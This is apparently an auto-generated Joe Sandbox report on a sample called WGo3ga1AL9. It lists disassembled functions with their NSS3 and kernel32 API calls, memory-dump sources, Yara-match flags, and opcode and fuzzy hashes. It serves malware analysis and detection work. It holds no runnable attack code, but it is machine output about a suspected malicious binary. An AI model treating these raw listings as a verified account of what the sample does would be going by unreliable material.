                                                                                                                                              • API String ID: 3425318038-0
                                                                                                                                              • Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                                                                                                              • Instruction ID: 23c55c91adbb6ba8cb2d8ffe2acc72982d6332429b1ecde802b93a8614411b74
                                                                                                                                              • Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                                                                                                              • Instruction Fuzzy Hash: 634182B5501606AFE740DF16DA48B92BBA5FF55358F148128DC188BFA1EB72E834CF90
                                                                                                                                              Function 6C72DDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C72DDEC
                                                                                                                                                • Part of subcall function 6C760840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7608B4
                                                                                                                                              • PK11_DigestBegin.NSS3(00000000), ref: 6C72DE70
                                                                                                                                              • PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C72DE83
                                                                                                                                              • HASH_ResultLenByOidTag.NSS3(?), ref: 6C72DE95
                                                                                                                                              • PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C72DEAE
                                                                                                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C72DEBB
                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C72DECC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1091488953-0
                                                                                                                                              • Opcode ID: c770d916745d5d451e262ec52f1850e1d9d7d8bee0d7b2ba88731f8a1c75fe01
                                                                                                                                              • Instruction ID: 471a5b1d7b66507b164517ce6f78fc1df203dd3f93f6b0855c4a5b6c855a4005
                                                                                                                                              • Opcode Fuzzy Hash: c770d916745d5d451e262ec52f1850e1d9d7d8bee0d7b2ba88731f8a1c75fe01
                                                                                                                                              • Instruction Fuzzy Hash: 3931E7B2D002146BEB10AE65AE49BBB76ACEF74708F050135ED09A7701FB35D918C6E2
                                                                                                                                              Function 6C707E30 Relevance: 10.6, APIs: 7, Instructions: 103memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6C707E48
                                                                                                                                                • Part of subcall function 6C760FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7087ED,00000800,6C6FEF74,00000000), ref: 6C761000
                                                                                                                                                • Part of subcall function 6C760FF0: PR_NewLock.NSS3(?,00000800,6C6FEF74,00000000), ref: 6C761016
                                                                                                                                                • Part of subcall function 6C760FF0: PL_InitArenaPool.NSS3(00000000,security,6C7087ED,00000008,?,00000800,6C6FEF74,00000000), ref: 6C76102B
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C707E5B
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
                                                                                                                                                • Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
                                                                                                                                                • Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
                                                                                                                                                • Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C
                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C707E7B
                                                                                                                                                • Part of subcall function 6C75FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C758D2D,?,00000000,?), ref: 6C75FB85
                                                                                                                                                • Part of subcall function 6C75FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C75FBB1
                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C82925C,?), ref: 6C707E92
                                                                                                                                                • Part of subcall function 6C75B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8318D0,?), ref: 6C75B095
                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C707EA1
                                                                                                                                              • SECOID_FindOID_Util.NSS3(00000004), ref: 6C707ED1
                                                                                                                                              • SECOID_FindOID_Util.NSS3(00000004), ref: 6C707EFA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$Arena$Alloc_Arena_FindItem_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3989529743-0
                                                                                                                                              • Opcode ID: d4ec01df73b5dcda25dacfda0c2858eba402ffc40dedd501d0a7b83245d26450
                                                                                                                                              • Instruction ID: 51ee31402005c78d5055b7e6a640327b2320434a85addd7eb3ade7844d41bc44
                                                                                                                                              • Opcode Fuzzy Hash: d4ec01df73b5dcda25dacfda0c2858eba402ffc40dedd501d0a7b83245d26450
                                                                                                                                              • Instruction Fuzzy Hash: A8317EF2B012159BEB108A699E48B5B73ECAF44658F194934ED59EBB41E730FC04C7E1
                                                                                                                                              Function 6C75DC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6C75D9E4,00000000), ref: 6C75DC30
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6C75D9E4,00000000), ref: 6C75DC4E
                                                                                                                                              • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6C75D9E4,00000000), ref: 6C75DC5A
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C75DC7E
                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C75DCAD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Alloc_Util$Arenamemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2632744278-0
                                                                                                                                              • Opcode ID: 94a91767e5bffdb26b4a94cf4f63a6ed16708b0d24d027a17cb411382dfb2f78
                                                                                                                                              • Instruction ID: c3ef836c5fdf1e2557be9fbaae9ace1555f7c9b5d544730e9773e458b7395726
                                                                                                                                              • Opcode Fuzzy Hash: 94a91767e5bffdb26b4a94cf4f63a6ed16708b0d24d027a17cb411382dfb2f78
                                                                                                                                              • Instruction Fuzzy Hash: 6E31AFB5A002019FE750CF1DDA88B92B7F8AF25358F548438E94CCBB01EB71E954CBA5
                                                                                                                                              Function 6C722E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C71E728,?,00000038,?,?,00000000), ref: 6C722E52
                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C722E66
                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C722E7B
                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000), ref: 6C722E8F
                                                                                                                                              • PL_HashTableLookup.NSS3(?,?), ref: 6C722E9E
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C722EAB
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C722F0D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3106257965-0
                                                                                                                                              • Opcode ID: aeab368710aa53ca296f1872af10318d95b92e888c29513003e3a8a137e3c21f
                                                                                                                                              • Instruction ID: aa1d6fe88d4f649e8d6e1e991c01fd355faa162b22cbb90ced9ced1d77de0124
                                                                                                                                              • Opcode Fuzzy Hash: aeab368710aa53ca296f1872af10318d95b92e888c29513003e3a8a137e3c21f
                                                                                                                                              • Instruction Fuzzy Hash: 023126B5E00106ABEB115F28DD488B6B779FF0526CB088174EC0887A12EB31ED65CBD1
                                                                                                                                              Function 6C718C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C718C1B
                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 6C718C34
                                                                                                                                              • PL_ArenaAllocate.NSS3 ref: 6C718C65
                                                                                                                                              • PR_Unlock.NSS3 ref: 6C718C9C
                                                                                                                                              • PR_Unlock.NSS3 ref: 6C718CB6
                                                                                                                                                • Part of subcall function 6C7ADD70: TlsGetValue.KERNEL32 ref: 6C7ADD8C
                                                                                                                                                • Part of subcall function 6C7ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                              • String ID: KRAM
                                                                                                                                              • API String ID: 4127063985-3815160215
                                                                                                                                              • Opcode ID: fac69022f3de3ec6a474609d40eed4324e8c6f581ef4cc9a8b2ba790bcd75cc0
                                                                                                                                              • Instruction ID: dce1ce97aa1a50e508a58f6c078c1cbd6437ddeed09cd8bd292c1c89da65f210
                                                                                                                                              • Opcode Fuzzy Hash: fac69022f3de3ec6a474609d40eed4324e8c6f581ef4cc9a8b2ba790bcd75cc0
                                                                                                                                              • Instruction Fuzzy Hash: 3E2174B1A096018FD700AF79C588559B7F4FF15308F0A89BAD8888BB11EB35D886CFD1
                                                                                                                                              Function 6C812C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_EnterMonitor.NSS3 ref: 6C812CA0
                                                                                                                                              • PR_ExitMonitor.NSS3 ref: 6C812CBE
                                                                                                                                              • calloc.MOZGLUE(00000001,00000014), ref: 6C812CD1
                                                                                                                                              • strdup.MOZGLUE(?), ref: 6C812CE1
                                                                                                                                              • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C812D27
                                                                                                                                              Strings
                                                                                                                                              • Loaded library %s (static lib), xrefs: 6C812D22
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                              • String ID: Loaded library %s (static lib)
                                                                                                                                              • API String ID: 3511436785-2186981405
                                                                                                                                              • Opcode ID: ee59952558b0f187da41d463560fb225d6945789a35810c1d3d52c9d829cd3ed
                                                                                                                                              • Instruction ID: fb6e3f134df14bd569fa92073de0d8c860338b3f7c0b6eb6b31473eca2c1b127
                                                                                                                                              • Opcode Fuzzy Hash: ee59952558b0f187da41d463560fb225d6945789a35810c1d3d52c9d829cd3ed
                                                                                                                                              • Instruction Fuzzy Hash: 3F1122B47042058FEB318F1AD908A6677F5AB4634DF04883DD80987F42D739E818CBE2
                                                                                                                                              Function 6C70BDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6C70BDCA
                                                                                                                                                • Part of subcall function 6C760FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7087ED,00000800,6C6FEF74,00000000), ref: 6C761000
                                                                                                                                                • Part of subcall function 6C760FF0: PR_NewLock.NSS3(?,00000800,6C6FEF74,00000000), ref: 6C761016
                                                                                                                                                • Part of subcall function 6C760FF0: PL_InitArenaPool.NSS3(00000000,security,6C7087ED,00000008,?,00000800,6C6FEF74,00000000), ref: 6C76102B
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C70BDDB
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
                                                                                                                                                • Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
                                                                                                                                                • Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
                                                                                                                                                • Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C70BDEC
                                                                                                                                                • Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76116E
                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6C70BE03
                                                                                                                                                • Part of subcall function 6C75FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C758D2D,?,00000000,?), ref: 6C75FB85
                                                                                                                                                • Part of subcall function 6C75FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C75FBB1
                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C70BE22
                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C70BE30
                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C70BE3B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1821307800-0
                                                                                                                                              • Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                              • Instruction ID: 8fcd705332a198c56619723d61f06700bddf58b25a19837f15930e0eee51f2e4
                                                                                                                                              • Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                              • Instruction Fuzzy Hash: B301F7E5B4020177F6101266AE0DB97368C4F5078DF140134EE04D6B82FB51E21983B5
                                                                                                                                              Function 6C791C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C791C74
                                                                                                                                                • Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF
                                                                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 6C791C92
                                                                                                                                              • free.MOZGLUE(?), ref: 6C791C99
                                                                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 6C791CCB
                                                                                                                                              • free.MOZGLUE(?), ref: 6C791CD2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalDeleteSectionfree$ErrorValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3805613680-0
                                                                                                                                              • Opcode ID: 96b530eaa43105231d78c27d73febd6ab6e97dae1fabc287c71f0e8c0a8a2323
                                                                                                                                              • Instruction ID: 5bd3bbd806b4e2d8c95dd5555e1ed02ce7a0a55848be6883c9d3f9d7b69e8af6
                                                                                                                                              • Opcode Fuzzy Hash: 96b530eaa43105231d78c27d73febd6ab6e97dae1fabc287c71f0e8c0a8a2323
                                                                                                                                              • Instruction Fuzzy Hash: 5301D6B1F012206FDF30AFA5AE0DB553778670B31DF440174E509A6B41D3699014CBD1
                                                                                                                                              Function 00419470 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateFileA.KERNEL32(>=A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413D3E,?), ref: 0041948C
                                                                                                                                              • GetFileSizeEx.KERNEL32(000000FF,>=A), ref: 004194A9
                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 004194B7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$CloseCreateHandleSize
                                                                                                                                              • String ID: >=A$>=A
                                                                                                                                              • API String ID: 1378416451-3536956848
                                                                                                                                              • Opcode ID: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                                                                                                                              • Instruction ID: 3a34b71ed32a5e038d40ec36a38ffc71a9509a973990dc3d9b0a1b42c7eefbe1
                                                                                                                                              • Opcode Fuzzy Hash: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                                                                                                                              • Instruction Fuzzy Hash: F2F04F39E08208BBDB10DFB0EC59F9E77BAAB48710F14C655FA15A72C0E6749A418B85
                                                                                                                                              Function 6C7A2E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7A3046
                                                                                                                                                • Part of subcall function 6C78EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C78EE85
                                                                                                                                              • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C777FFB), ref: 6C7A312A
                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7A3154
                                                                                                                                              • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7A2E8B
                                                                                                                                                • Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF
                                                                                                                                                • Part of subcall function 6C78F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C779BFF,?,00000000,00000000), ref: 6C78F134
                                                                                                                                              • memcpy.VCRUNTIME140(8B3C75C0,?,6C777FFA), ref: 6C7A2EA4
                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7A317B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
